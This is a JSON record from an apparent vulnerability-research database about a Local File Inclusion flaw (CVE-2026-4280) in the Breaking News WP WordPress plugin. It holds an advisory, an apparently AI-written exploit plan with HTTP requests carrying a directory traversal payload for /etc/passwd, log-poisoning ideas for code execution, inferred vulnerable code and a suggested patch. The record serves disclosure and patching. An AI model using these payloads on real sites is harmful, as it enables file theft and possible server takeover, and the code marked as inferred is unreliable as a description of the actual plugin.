[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fSfZSiRlqOpwzuvpoT49YGnLKYfU0NhBj_6V0VhTqJN0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-4280","breaking-news-wp-missing-authorization-to-authenticated-subscriber-local-file-inclusionread","Breaking News WP \u003C= 1.3 - Missing Authorization to Authenticated (Subscriber+) Local File Inclusion\u002FRead","The Breaking News WP plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3. This is due to the brnwp_ajax_form AJAX endpoint lacking both authorization checks and CSRF verification, combined with insufficient path validation when the brnwp_theme option value is passed directly to an include() statement in the brnwp_show_breaking_news_wp() shortcode handler. While sanitize_text_field() is applied to user input, it does not strip directory traversal sequences (..\u002F). 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite the brnwp_theme option with a directory traversal payload (e.g., ..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd) and subsequently trigger file inclusion of arbitrary files on the server when the shortcode is rendered.","breaking-news-wp",null,"\u003C=1.3","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-04-21 19:05:09","2026-04-22 07:45:34",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4772b482-f5e5-4707-b012-aca70fc89e49?source=api-prod",[],"researched",false,3,"This research plan outlines the steps required to demonstrate the Local File Inclusion (LFI) vulnerability in the **Breaking News WP** plugin (version \u003C= 1.3).\n\n---\n\n### 1. Vulnerability Summary\nThe **Breaking News WP** plugin contains a critical flaw where an authenticated user (Subscriber level or higher) can update plugin settings via an unprotected AJAX endpoint and subsequently trigger arbitrary file inclusion. \n\nThe vulnerability exists because:\n1.  The `brnwp_ajax_form` AJAX action lacks authorization (`current_user_can`) and CSRF (`check_ajax_referer`) checks.\n2.  The plugin uses `sanitize_text_field()` on the `brnwp_theme` parameter, which does not remove directory traversal sequences (`..\u002F`).\n3.  The `brnwp_show_breaking_news_wp()` shortcode handler retrieves the `brnwp_theme` option and passes it directly into a PHP `include()` statement without validation or path restriction.\n\n### 2. 
Attack Vector Analysis\n-   **AJAX Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n-   **AJAX Action:** `brnwp_ajax_form`\n-   **Vulnerable Parameter:** `brnwp_theme`\n-   **Trigger Point:** Any page or post containing the `[breaking-news-wp]` shortcode.\n-   **Authentication:** Required (Subscriber level is sufficient).\n-   **Preconditions:** The attacker must be logged in to access `wp_ajax_` hooks.\n\n### 3. Code Flow\n1.  **Input Phase (AJAX):**\n    -   A Subscriber user sends a POST request to `admin-ajax.php` with `action=brnwp_ajax_form`.\n    -   The `brnwp_ajax_form()` function (inferred) is executed.\n    -   The function takes `$_POST['brnwp_theme']`, passes it through `sanitize_text_field()`, and saves it via `update_option('brnwp_theme', ...)`.\n2.  **Trigger Phase (Shortcode):**\n    -   The user visits a frontend page where `[breaking-news-wp]` is rendered.\n    -   The handler `brnwp_show_breaking_news_wp()` (inferred) is called.\n    -   Inside this function:\n        ```php\n        $theme = get_option('brnwp_theme');\n        \u002F\u002F ... some logic ...\n        include($theme); \u002F\u002F LFI Sink\n        ```\n\n### 4. Nonce Acquisition Strategy\nThe vulnerability description explicitly states that the `brnwp_ajax_form` endpoint **lacks CSRF verification**. Therefore, **no nonce is required** to exploit the AJAX endpoint.\n\nIf the AJAX handler *were* to require a nonce, the strategy would be:\n1.  Create a post with the shortcode: `wp post create --post_content='[breaking-news-wp]' --post_status=publish`.\n2.  Navigate to that page using `browser_navigate`.\n3.  Execute `browser_eval(\"window.brnwp_vars?.nonce\")` (inferred JS object name) to retrieve the nonce.\n*Note: Since the description confirms the lack of CSRF, we will proceed by omitting the nonce.*\n\n### 5. 
Exploitation Strategy\n\n#### Step 1: Update the Theme Option\nThe attacker sends an AJAX request to change the \"theme\" path to a system file using directory traversal.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=brnwp_ajax_form&brnwp_theme=..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd\n```\n\n#### Step 2: Trigger the Inclusion\nThe attacker navigates to a page containing the plugin's shortcode to trigger the `include()` call.\n\n**HTTP Request:**\n```http\nGET \u002Ftrigger-page\u002F HTTP\u002F1.1\n```\n\n### 6. Test Data Setup\n1.  **User Creation:** Create a subscriber user to prove low-privileged access is sufficient.\n    -   `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n2.  **Trigger Page:** Create a public page containing the vulnerable shortcode.\n    -   `wp post create --post_type=page --post_title=\"Breaking News\" --post_status=publish --post_content='[breaking-news-wp]'`\n    -   *Note: Record the URL of the created page.*\n\n### 7. Expected Results\n-   **AJAX Response:** The `admin-ajax.php` call should return a success status (often `1` or a JSON success message).\n-   **LFI Result:** When visiting the trigger page, the content of `\u002Fetc\u002Fpasswd` (or the targeted local file) should be rendered within the HTML source of the page, typically where the \"Breaking News\" ticker would appear.\n\n### 8. Verification Steps\n1.  **Check Option Value:** Use WP-CLI to verify the option was successfully overwritten with the traversal payload.\n    -   `wp option get brnwp_theme`\n    -   *Expected Output:* `..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd`\n2.  **Verify File Content:** Check if the string `root:x:0:0:` exists in the HTML response of the trigger page.\n\n### 9. 
Alternative Approaches\n-   **Log File Inclusion:** If system files like `\u002Fetc\u002Fpasswd` are restricted by `open_basedir`, attempt to include the WordPress debug log (if enabled) or web server access logs to achieve Remote Code Execution (RCE) via log poisoning.\n    -   Payload: `..\u002F..\u002F..\u002F..\u002Fwp-content\u002Fdebug.log`\n-   **Plugin File Inclusion:** Attempt to include another plugin file or a theme file to confirm the traversal works even within the `wp-content` directory.\n    -   Payload: `..\u002Factive-theme\u002Ffunctions.php`\n-   **Direct Option Injection:** If the AJAX handler uses a different key for the form, use `grep -r \"update_option\" .` in the plugin directory to find the exact key name.","The Breaking News WP plugin for WordPress is vulnerable to Local File Inclusion via the brnwp_theme option. An authenticated attacker (Subscriber+) can update this option through an unprotected AJAX endpoint and then trigger the inclusion of arbitrary local files by viewing a page containing the plugin's shortcode.","\u002F\u002F In the AJAX handler function\nfunction brnwp_ajax_form() {\n    \u002F\u002F Missing authorization check (current_user_can)\n    \u002F\u002F Missing CSRF check (check_ajax_referer)\n    if (isset($_POST['brnwp_theme'])) {\n        update_option('brnwp_theme', sanitize_text_field($_POST['brnwp_theme']));\n    }\n}\nadd_action('wp_ajax_brnwp_ajax_form', 'brnwp_ajax_form');\n\n---\n\n\u002F\u002F In the shortcode handler function\nfunction brnwp_show_breaking_news_wp($atts) {\n    $theme = get_option('brnwp_theme');\n    \u002F\u002F ...\n    if ($theme) {\n        include($theme); \u002F\u002F LFI Sink: Insufficient path validation\n    }\n    \u002F\u002F ...\n}\nadd_shortcode('breaking-news-wp', 'brnwp_show_breaking_news_wp');","--- breaking-news-wp.php\n+++ breaking-news-wp.php\n@@ -10,6 +10,8 @@\n \n function brnwp_ajax_form() {\n+    check_ajax_referer('brnwp_nonce_action', 'security');\n+    if 
(!current_user_can('manage_options')) {\n+        wp_die();\n+    }\n     if (isset($_POST['brnwp_theme'])) {\n-        update_option('brnwp_theme', sanitize_text_field($_POST['brnwp_theme']));\n+        $allowed_themes = array('theme1.php', 'theme2.php');\n+        $theme = sanitize_text_field($_POST['brnwp_theme']);\n+        if (in_array($theme, $allowed_themes)) {\n+            update_option('brnwp_theme', $theme);\n+        }\n     }\n }\n \n function brnwp_show_breaking_news_wp($atts) {\n     $theme = get_option('brnwp_theme');\n-    if ($theme) {\n-        include($theme);\n+    $theme_path = plugin_dir_path(__FILE__) . 'themes\u002F' . basename($theme);\n+    if (file_exists($theme_path)) {\n+        include($theme_path);\n     }\n }","The exploit involves two stages: updating the vulnerable option and triggering the file inclusion. \n\n1. Authentication: The attacker authenticates as a Subscriber (or any role) to access the 'wp_ajax_' hooks.\n2. Option Injection: The attacker sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the 'action' parameter set to 'brnwp_ajax_form'. The 'brnwp_theme' parameter is set to a directory traversal payload targeting a sensitive file (e.g., '..\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fetc\u002Fpasswd'). Because the endpoint lacks authorization and CSRF checks, the 'brnwp_theme' option in the database is updated.\n3. Trigger: The attacker visits any page or post on the site that renders the '[breaking-news-wp]' shortcode. 
The shortcode handler retrieves the malicious 'brnwp_theme' value and passes it directly to PHP's 'include()' function, causing the contents of the target file to be rendered in the HTTP response.","gemini-3-flash-preview","2026-04-27 14:04:27","2026-04-27 14:04:41",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbreaking-news-wp\u002Ftags"]